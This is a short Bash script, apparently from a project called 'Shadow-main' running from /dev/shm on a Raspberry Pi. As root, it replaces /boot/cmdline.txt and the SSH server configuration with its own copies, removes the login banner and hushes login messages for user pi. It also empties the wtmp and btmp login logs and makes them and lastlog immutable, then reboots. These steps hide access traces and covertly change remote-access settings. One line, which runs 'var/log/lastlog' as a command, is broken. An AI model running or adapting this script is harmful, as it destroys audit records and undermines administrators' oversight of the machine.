file=cmdline.txt
path1="/dev/shm/Shadow-main"
path2="/boot"
file1=$path1/$file
file2=$path2/$file

size1=$(stat -c %s "$file1")
size2=$(stat -c %s "$file2")


if [ ! "$size1" -eq "$size2" ]; then
    sudo rm /etc/motd    

    sudo rm "$file2"
    sudo cp "$file1" "$path2"
   
    sudo rm "/etc/ssh/sshd_config"
    sudo cp "$path1/sshd_config" "/etc/ssh"
   
    sudo touch /home/pi/.hushlogin
    sudo var/log/lastlog
    sudo chattr +i /var/log/lastlog
    >/var/log/wtmp
    >/var/log/btmp
    sudo chattr +i /var/log/wtmp /var/log/btmp

    sudo reboot
fi
